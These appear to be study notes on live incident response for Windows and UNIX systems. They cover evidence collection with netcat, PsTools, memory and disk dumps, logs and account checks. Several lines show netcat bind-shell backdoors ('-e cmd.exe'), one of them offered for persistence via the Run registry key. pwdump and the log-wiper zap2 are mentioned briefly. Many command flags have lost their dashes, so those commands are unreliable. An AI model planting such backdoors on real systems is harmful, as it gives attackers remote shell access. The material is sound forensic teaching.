You are on page 1of 14

Windows Live Response

Chapter 1
Live Incident Response Process
Start a netcat server on forensic workstation with the following
command:
nc v l p 2222>command.txt
On the victim computer you will want to run a command to collect live
response data.
The data can be sent from the victim computer with the following
command:
command | nc forensic_workstation_ip_address 2222
ip address of forensic workstation
A simple MD5 checksum of command.txt can be calculated so that you
may prove its authenticity at a later date:
md5sum b command.txt > command.md5
You will always want to use the b command-line switch. md5sum is
available in the Cygwin utilities from www.cygwin.com.
A variant of netcat is named cryptcat
(http://sourceforege.net/projects/cryptcat) should be used because it
encrypts all fo the data across the TCP channel. Because the data is
encrypted, intruders will not be able to see what you are collecting.

Analyzing Volatile Data


1) System Date and Time
The time and dare are simply collected by issuing the time and date
commands at the prompt.
2) Current Network Connections
We view a machines network connections by issuing the netstat
command. We specify the an flags with netstat to retrieve all of the
network connections and the raw IP addresses instead of the Fully
Qualified Domain Names (FQDN)
netstat an

Port 445 file sharing port (NETBIOS runs on this port)


Port 21 FTP port
Port 3753 NattyServer (EVIL)

Windows Live Response


Chapter 1

Use www.portsdb.org to find out what services run on ports.


Ports above 1024 typically are ephemeral ports.
3) Open TCP or UDP Ports and 4)Executables Opening TCP or
UDP Ports
Use FPort to examine strange ports that are open on the machine to
link to the executables that opened them. This can be found at
www.foundstone.com.
Rename your netcat binary to t_NC.EXE to symbolize that it is
trusted.
5) Cached NETBIOS Name Tables
Windows (up until version 2003) stored connection specifics by
NetBIOS name rather than IP address. Because we want to map a
NetBIOS name to an IP address to throttle the nefarious individual, we
can issue the nbtstat command during our live response to dump the
victim systems NetBIOS name cache. This command will only show us
the NetBIOS name table cache, not a complete history of connections.
nbtstat c
6) Users Currently Logged On
Run PsLoggedOn which is a tool distributed within PsTools suite from
www.sysinternals.com. This tool will return the users that are currently
logged onto the system or accessing the resource shares.
For a user to be connected remotely, ho or she must be connected to a
NetBIOS port. For Windows 2000, it is TCP port 445 or 139.
7) The Internal Routing Table
We can examine the routing table by issuing the netstat command
with the rn command-line switch.
netstat rn
8) Running Processes
2

To learn the processes the attacker executed use the pslist tool from
the PsTools suite distributed from www.sysinternals.com.

Windows Live Response


Chapter 1
The first several lines can be system processes based on the lengthy
elapsed running time. This is indicative of processes running since
startup, which are typical system processes.
PsExec is a tool distributed from www.sysinternals.com that enables a
valid user to connect from one Microsoft Windows machine to another
and execute a command over a NetBIOS connection. Attackers use
this tool to typically run cmd.exe. First, PsExec will only open a
channel if you supply proper administrator-level credentials. Therefore
the attacker has an administrator-level password. Second, the attacker
knows one of the passwords and password may work on other
machines in the enterprise. Third, the attacker must be running a
Microsoft Windows system on his attacking machine to execute PsExec.
One of the first things attackers usually do when they gain acces to a
system is to transfer their tools to a victim machine.
9) Running Services
We can easily obtain a list of services with the PsService executable
distributed in the PsTools suite. The tool is run without command-line
arguments to obtain the data we need.
10) Scheduled Jobs
Attackers with administrative access can schedule jobs. By typing at
we see any jobs that may be scheduled to run.
11) Open Files
Use PsFile to examine the list of open files. This can be retrieved from
the PsTools suite.
PsExec and PsFile will reveal the NetBIOS name of the computer that is
attacking. Once you seize the attackers computer, you may want to
search for the NetBIOS name as a keyword on the attackers computer.
12) Process Memory Dumps
3

We need to capture the memory space of the suspect processes.


Details on structure, organization, and management of memory on
these operating systems, we recommend the excellent reference,
Inside Windows 2000, Third Edition by David Solomon and
Mark Russinovich.

Windows Live Response


Chapter 1
Microsoft provides a utility called userdump.exe for the Windows NT
family of operating systems. This tool is a component of the Microsoft
OEM Support tools package available at:
http://download.microsoft.com/download/win2000srv/Utility/3.0/NT45/E
N-US/Oem3sr2.zip
userdump writes processs extracted memory to disk, so dont use
netcat sessions to transfer the data directly. So before you execute
userdump commands, which would write to the suspect systems
hard drive, map a network share to your forensic system.
C:\> net use Z: \\103.98.91.200\data
To execute userdump on a single suspect process, we supply it with a
process ID (PID) that we obtained from the earlier pslist command and
a destination. To save the attackers netcat session (PID 1424) to our
mapped drive at Z:, we execute:
userdump 1424 Z:\nc_1424.dmp
Once you have the process memory dumps, perform an initial
examination with dumpchk.exe a utility provided as a component of
the Debugging Tools For Windows, which are available at:
www.microsoft.com/whdc/ddk/debugging/default.mspx
Several of these utilities may require symbols form the Windows
operating system that were the source of the memory dump. These
symbols and information on their use are available at:
www.microsoft.com/whdc/ddk/debugging/symbols.mspx
Execute dumpchk to examine the suspected netcat process:
D:\dumpchk nc_1424.dmp
4

Sample output:
CommandLine: nc d L n p 60906 e cmd.exe
This output indicates that netcat was configured to detach from the
console, listen on port 60906 and execute a command shell whenever
a connection occurred.

Windows Live Response


Chapter 1
Now you examine the memory dumps for additional information by
searching the ASCII strings that are embedded within. Because data
stored by an application or process in memory may be in Unicode
format, use a Unicode-capable Windows version of the strings
command.
One is available at www.sysinternals.com/ntw2k/source/misc.shtml,
which displays Unicode and standard ASCII by default. The Linux
Strings command does not display Unicode strings by default, so if
you are using this as a forensic processing platform, make sure that
you enable this option.
Run:
strings nc_1424.dmp
13) Full System Memory Dumps
Use dd and get it here:
http://users.erols.com/gmgarner/forensics
These utilities are based on UnxUtils distribution which can be found at
http://unxutils.sourceforge.net.
On UNIX systems, you can use /dev/kmem, but Windows NT systems
do not provide a file object like that but dd creates a
/Device/PhysicalMemory section object. A section object also called
a file-mapping object, represents a block of memory that two or more
processes can share. By mapping the /Device/PhysicalMemory to
virtual address space, dd enables you to generate a dump
representing system memory.
Use the following command line to capture system memory:

D:\>dd.exe if=:\\.\physicalmemory
of=z:\JBRWWW_full_memory_dump.dd bs=4096
To obtain an image of the entire physical hard drive from the live
system without requiring a shutdown, reboot or disruption of service,
use:
D:\>dd.ece if=\\.\physicaldrive0
of=z:\JBRWWW_physicaldrive0.dd bs=4096

Windows Live Response


Chapter 1

Analyzing Nonvolatile Data


1) System Version and Patch Level
Knowing which patches have been applied to the server will enable us
to narrow our initial investigation to areas of high probability. A
program called PsInfo distributed
from the PsTools suite at www.sysinternals.com will enable us to query
for system information.
Run:
psinfo h s d
2) File System Time and Date Stamps
Standard dir is good but there is something better. In the UnxUtils
package, available from unxutils.sourceforge.net you will find a
command called find. If you are familiar with Cygwin you can also
use the find utility from that tool set.
Run:
find c:\ -printf %m;%Ax;%AT;%Tx;%TT;%Cx;%CT;%U;%G;%s;%p
\n
The semicolon delimits each of the attributes to enable us to import it
into a spreadsheet.
2) Registry Data

We can capture the complete registry in a rather cryptic format by


using RegDmp without command-line options. We can see the key
\HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVe
rsion with three sub keys: Run, RunOnce and RunOnceEx. Any values
in Run signify programs that will be executed when the system starts
up.
If you want to attack, you can place the following command in the
registry to automatically open a backdoor:
nc d L p 10000 e C:\winnt\system32\cmd.exe
3) The Auditing Policy

Windows Live Response


Chapter 1
Win NT and Win 2000 do not have auditing turned on by default,
therefore, there are no security-related logs. The command to
determine the auditing policy is auditpol. Auditpol is distributed with
Microsofts resource kits.
4) A History of Logins
A history of logins can be obtained with the NTLast command,
distributed by www.foundstone.com. NTLast is run without commandline arguments to get all of the login info. It is very important to
enable auditing.
5) System Event Logs
There are typically three types of event logs on a Windows machine.
- Security
- Application
- System
The command PsLogList within the PsTools suite distributed at
www.sysinternals.com will extract these logs into an easy to read
format.
Run:
psloglist s x security

The s switch tells psloglist to dump each event on a single line. The
x switch tells psloglist to dump the extended information for each
event.
6) User Accounts
Use pwdump which dumps the user accounts.
7) IIS Logs
You cannot block what you must allow in.
The IIS Web server writes any activity to logs in the
C:\winnt\system32\logfiles directory by default. To see what is in
the logs, type them out.
First, execute this on the forensic workstation:
nc v l p 2222 > ex030923.log

Windows Live Response


Chapter 1
Then, type the following command to transfer the file name
ex030923.log to the forensic workstation:
type c:\winnt\system32\logfiles\w3svc1\ex030923.log | nc
forensic_workstation_ip_address 2222
Chapter 1
Press CTRL-C when the file is finished transferring. Note that the time
in the logs is GMT, not EDT. The default fields are recorded in the logs
but there are more fields that can be recorded if the administrator
enables them. A good reference for these fields exists at:
www.microsoft.com/technet/prodtechnol/windowsserver2003/proddocs/
standard/ref_we_logging.asp
Nikto is a well-known Web server vulnerability scanning tool available
from www.cirt.net/code/nikto.shtml
Web vulnerability scanners generate numerous result codes in the
400s. Other result codes can be compared to the chart at
http://www.iisfaq.com/default.aspx?View=A145&P=230.

When attacks are successful against a vulnerable server, it causes the


Web server to crash so activity is not logged in the IIS log. The Web
server should never access the cmd.exe command shell.
8) Suspicious Files
To transfer any suspicious file , run the following on the forensic
workstation:
Nc v l p 2222 > filename
Then, transfer the file named filename by using type:
type filename | nc forensic_workstation_ip_address 2222
Putting It All Together
http://www.sans.org/reading_room/whitepapers/threats/unicod
e-vulnerability-why_458

UNIX Live Response


Chapter 2
On forensic workstation, run:
nc v l p 10000 > command.txt
On the victim computer, run:
command | nc forensic_workstation_ip_address 10000
Remember to press CTRL-C to break the netcat session.
Run:
Md5sum b command.txt > command.md5
1) System Date and Time
Run:
Date
2) Current Network Connections
Run:
netstat an
9

Port 515 is the port on which the printer daemon typically listens.
Doing a quick search for Redhat 7.0 and the printer daemon (lpd) on
www.securityfocus.com you see that this is a vulnerable TCP port.
3) Open TCP or UDP Ports
Run the following to see the process number that opened the port.
This only works on Linux and will not work on other flavors of UNIX:
netstat anp
The UNIX version of FPort is lsof for List Open Files. lsof is the single
most powerful tool in the Live Response toolkit for Unix systems.
Run:
lsof n

UNIX Live Response


Chapter 2
A good source on loaded kernel modules is the book: Malware: Fighting
Malicious Code by Ed SKoudis.
4) Running Processes
Run to see list of all the running processes on the system and the users
running them:
ps aux
5) Open Files
Run:
Lsof
6) The Internal Routing Table
netstat rn
7) Loaded Kernel Modules
Run:
lsmod
8) Mounted File Systems
10

Run:
mount or df

Analyzing Nonvolatile Data


1) System Version and Patch Level
Run to get all the available operating system version information:
uname a
Run to get package and version number:
rpm qa

UNIX Live Response


Chapter 2
2) File System Time and Date Stamps
Run:
find c:\ -printf %m;%Ax;%AT;%Tx;%TT;%Cx;%CT;%U;%G;%s;%p
\n
3) File System MD5 Checksum Values
Databases of known hashes of known system files are available at
www.hashkeeper.org
To calculate the MD5 checksum for every file on the system, run:
Find / -type f xdev exec md5sum b {} \;
4) Users Currently Logged On
Users who are currently logged on are saved in the /var/run/utmp.log
Run:
w
Attackers who want to seriously hamper your investigation can use
zap2, publically available from www.packetstormsecurity.com
5) A History of Logins
11

A history of logins is saved in /var/log/wtmp binary logs.


Run:
last
Datapipe is a utility that will listen on one port and forward the traffic
to another port on another machine.
6) Syslog Logs
The syslog daemon listens for messages from either local programs or
other servers on the Internet and logs them according to the
/etc/syslog.conf configuration file
The two logs relevant to an investigation are /var/log/messages and
/var/log/secure. The fifth field is the message that was logged.
When buffer overflows occur, they break valid programs. When
programs break, garbage is typically generated in the log.

UNIX Live Response


Chapter 2
7) User Accounts
Examine /etc/passwd to see whether the intruder has added any
rogue user accounts
A rogue account can have a root directory of / and more importantly a
user ID of zero.
8) User History Files
Go to username.bash_history t osee files that may contain commands
that failed. For example, ps auxw | grep datapipe, shows the
intruder looking for the keyword datapipe.
9) Suspicious Files
Transfer any suspicious files with netcat. Run:
nc v l p 10000 > filename
Transfer the file named filename to the forensic workstation:
cat filename | nc forensic_workstation_ip_address 10000

12

By entering the /proc directory you can see references to running


processes and other system information. You see directories named
after integers, such as 1348. There is another important directory
within the /proc/1348 directory, called the fd directory.

UNIX Live Response


Chapter 3
To be continued:
NBE Network Based Evidence
When most people consider network-based evidence, thoughts of firing
up Tcpdump or Wireshark come to mind.
Investigators collect four types of NBE:
- Full content data
- Session data
- Alert data
- Statistical data

13

14

You might also like